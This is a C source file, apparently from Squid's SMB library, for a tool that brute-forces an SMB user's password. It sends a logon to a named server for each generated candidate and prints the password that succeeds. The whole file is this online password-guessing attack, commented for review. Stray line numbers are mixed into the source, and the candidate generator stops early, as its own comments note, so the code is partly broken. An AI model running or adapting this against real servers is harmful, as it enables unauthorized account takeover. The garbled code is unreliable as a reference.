1 #include "squid.h"
2 /* Find passwords ... */
/* We do it in a brute force way ... Cycle through all the possible passwords,
   sending a logon for each to see if it works ... We have to wait for any
   timeout that the server implements before we try the next one. We could open
   lots of connections to the server and then send the logon request and not
   wait for the reply. This would allow us to have lots of outstanding attempts
   at a time. */
9
10 #include <sys/types.h>
11 #include <unistd.h>
12 #if HAVE_STRING_H
13 #include <string.h>
14 #endif
15
16 #include "smblib/smblib.h"
17
/* Run-time flags.  main() sets verbose when -v is given; lotc is not
 * referenced by any code visible in this file. */
int verbose = FALSE;
int lotc = FALSE;

/*
 * Dialect names handed to SMB_Negotiate(), terminated by NULL.
 * NOTE(review): every entry is an SMB1-era (LAN Manager / NT LM) dialect
 * string, so a server with SMB1 disabled presumably rejects the
 * negotiation outright -- confirm against smblib.
 */
char *SMB_Prots[] = {
    "PC NETWORK PROGRAM 1.0",
    "MICROSOFT NETWORKS 1.03",
    "MICROSOFT NETWORKS 3.0",
    "LANMAN1.0",
    "LM1.2X002",
    "LANMAN2.1",
    "NT LM 0.12",
    "NT LANMAN 1.0",
    NULL
};
31
/*
 * Write the command-line synopsis to stderr.
 * The synopsis lists -u and -l only; main() also accepts -s <service>
 * and -v, which are not mentioned here.
 */
void usage()
{
    fputs("Usage: find_password -u <user> -l <pwd-len-max> server\n", stderr);
}
37
38 /* figure out next password */
39
/* Generator state kept across calls: pwinit records whether the candidate
 * buffer has been cleared yet, pwpos is the index of the byte that the
 * next call increments. */
static int pwinit = FALSE, pwpos = 0;

/*
 * Advance pw, in place, to the next candidate string.
 *
 * pw     caller-owned buffer; the first call zeroes pwlen + 1 bytes of it,
 *        so it must be at least that large (nothing here checks the size).
 * pwlen  maximum candidate length.
 *
 * Returns TRUE when pw holds a new candidate.  Returns FALSE when pwpos
 * reaches pwlen, and also when the byte at pwpos wraps around while
 * pwpos is greater than 0.
 *
 * The state lives in file-scope statics, so there is one sequence per
 * process and no way to restart it.
 */
int next_password(char *pw, int pwlen)
{
    int idx;

    /* First call only: clear the buffer and start at index 0. */
    if (pwinit == FALSE) {
        pwinit = TRUE;
        memset(pw, 0, pwlen + 1);
        pwpos = 0;
    }

    idx = pwpos;
    pw[idx] = pw[idx] + 1;

    /* No wrap-around: pw already holds the next candidate. */
    if (pw[idx] != 0)
        return(TRUE);

    /* The byte wrapped to 0.  Candidates never contain a zero byte, so
     * restart this position at 1. */
    pw[idx] = 1;

    /* With a lower index available the function reports FALSE here and
     * leaves pw[idx - 1] untouched. */
    if (idx > 0)
        return(FALSE);

    /* Index 0 wrapped: grow the candidate by one position, if allowed. */
    pwpos = pwpos + 1;
    if (pwpos >= pwlen)
        return(FALSE); /* No more passwords */

    pw[pwpos] = 1;
    return(TRUE);
}
84
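static char pwd_str[1024]; /* Where we put passwords as we convert them */

/*
 * Render a password so it can be written to a terminal or log.
 *
 * Bytes that are <= ' ' or > 127 are written as a backslash followed by
 * the byte's value as three decimal digits (for example a space becomes
 * "\032"); all other bytes are copied unchanged.
 *
 * Returns a pointer to the static buffer pwd_str, which the next call
 * overwrites; the function is therefore not reentrant.  Output that would
 * not fit in pwd_str is cut off at the last whole character that fits.
 *
 * Each byte is read as unsigned char and formatted into a four-character
 * escape.  Formatting the plain char into a 3-byte limit dropped the last
 * digit, left a NUL in the middle of the result, and printed a minus sign
 * for bytes above 127 where char is signed.
 */
char *print_password(char * password)
{
    size_t len = strlen(password); /* hoisted out of the loop condition */
    size_t out = 0;
    size_t i;

    for (i = 0; i < len; i++) {
        unsigned char ch = (unsigned char)password[i];

        if (ch <= ' ' || ch > 127) {
            /* Needs four characters plus room for the terminator. */
            if (out + 4 >= sizeof(pwd_str))
                break;
            snprintf(&pwd_str[out], 5, "\\%03u", (unsigned)ch);
            out += 4;
        } else {
            if (out + 1 >= sizeof(pwd_str))
                break;
            pwd_str[out++] = (char)ch;
        }
    }

    pwd_str[out] = 0; /* Put a null on the end ... */

    return(pwd_str);
}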
116
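/* Print the message for the most recent smblib failure on stdout. */
static void report_smb_error(void)
{
    char err_string[1024] = ""; /* zero-filled in case the helper writes nothing */
    int SMB_Error;

    if (SMB_Get_Last_Error() == SMBlibE_Remote) {
        SMB_Error = SMB_Get_Last_SMB_Err();
        SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error),
                              SMBlib_Error_Code(SMB_Error),
                              err_string,
                              sizeof(err_string) - 1);
    } else {
        SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string, sizeof(err_string) - 1);
    }

    printf(" %s\n", err_string);
}

/*
 * Entry point.
 *
 * Options: -s <service> (default "IPC$"), -u <user>, -l <pwd-len-max>,
 * -v for verbose output; the first remaining argument is the server
 * (default "nemesis").
 *
 * Connects to the server, negotiates a dialect from SMB_Prots, then calls
 * SMB_Logon_And_TCon() with each candidate produced by next_password()
 * until one is accepted or the generator returns FALSE.
 *
 * Exits 0 when a logon succeeds and 1 on bad arguments, connection or
 * negotiation failure, or when the candidates run out.
 */
int main(int argc, char *argv[])
{
    void *con, *tree;
    extern char *optarg;
    extern int optind;
    int opt, n;
    int pwlen = 0; /* 0 means -l was not given */
    long len_arg;
    char *end;
    char server[80], service[80], service_name[160], password[80], username[80];

    server[0] = 0;
    snprintf(service, sizeof(service), "%s", "IPC$");
    service_name[0] = 0;
    username[0] = 0;
    password[0] = 0;

    while ((opt = getopt(argc, argv, "s:u:l:v")) != -1) {

        switch (opt) {
        case 's':
            /* Bounded copy: optarg comes straight from the command line. */
            snprintf(service, sizeof(service), "%s", optarg);
            break;

        case 'u': /* Pick up the user name */
            snprintf(username, sizeof(username), "%s", optarg);
            break;

        case 'l': /* pick up password len */
            /* next_password() clears pwlen + 1 bytes of password[], so the
             * length has to stay inside that array. */
            len_arg = strtol(optarg, &end, 10);
            if (end == optarg || *end != '\0' ||
                    len_arg < 1 || len_arg > (long)(sizeof(password) - 1)) {
                fprintf(stderr, "Password length must be between 1 and %d\n",
                        (int)(sizeof(password) - 1));
                usage();
                exit(1);
            }
            pwlen = (int)len_arg;
            break;

        case 'v': /* Verbose? */
            verbose = TRUE;
            break;

        default:
            usage();
            exit(1);
            break;
        }

    }

    /* Without -l there is no length to work with; refuse to run instead of
     * reading an uninitialized pwlen. */
    if (pwlen == 0) {
        usage();
        exit(1);
    }

    if (optind < argc) { /* Some more parameters, assume is the server */
        snprintf(server, sizeof(server), "%s", argv[optind]);
        optind++;
    } else {
        snprintf(server, sizeof(server), "%s", "nemesis");
    }

    /* Build \\server\service before touching the network.  The two parts
     * can add up to more than service_name holds, so check for truncation. */
    n = snprintf(service_name, sizeof(service_name), "\\\\%s\\%s", server, service);
    if (n < 0 || (size_t)n >= sizeof(service_name)) {
        fprintf(stderr, "Service name \\\\%s\\%s is too long\n", server, service);
        exit(1);
    }

    if (verbose == TRUE) { /* Print out all we know */

        fprintf(stderr, "Finding password for User: %s, on server: %s\n",
                username, server);
        fprintf(stderr, "with a pwlen = %i\n", pwlen);

    }

    SMB_Init(); /* Initialize things ... */

    /* We connect to the server and negotiate */

    con = SMB_Connect_Server(NULL, server);

    if (con == NULL) { /* Error processing */

        fprintf(stderr, "Unable to connect to server %s ...\n", server);
        report_smb_error();
        exit(1);

    }

    /* We need to negotiate a protocol better than PC NetWork Program */

    if (SMB_Negotiate(con, SMB_Prots) < 0) {

        fprintf(stderr, "Unable to negotiate a protocol with server %s ...\n",
                server);
        report_smb_error();
        exit(1);

    }

    /* Now loop through all password possibilities ...  Every rejected
     * candidate is a failed logon as far as the server is concerned, so
     * the server's lockout policy and failed-logon logging are what bound
     * and record this loop. */

    memset(password, 0, sizeof(password));

    while (next_password(password, pwlen) == TRUE) {

        tree = SMB_Logon_And_TCon(con,
                                  NULL,
                                  username,
                                  password,
                                  service_name, "?????");

        if (tree != NULL) { /* Password match */

            fprintf(stderr, "Logged in with password:%s\n",
                    print_password(password));

            /* Exit now ... */

            exit(0);

        }

        if (verbose == TRUE) { /* Lets hear about the error */

            fprintf(stderr, "Unable to logon and tree connect to server %s ...\n",
                    server);
            fprintf(stderr, "With username: %s, and password: %s\n",
                    username, print_password(password));
            report_smb_error();

        }

    }

    fprintf(stderr, "Passwords exhausted.");

    /* Explicit status; falling off the end of main left it unspecified. */
    return 1;
}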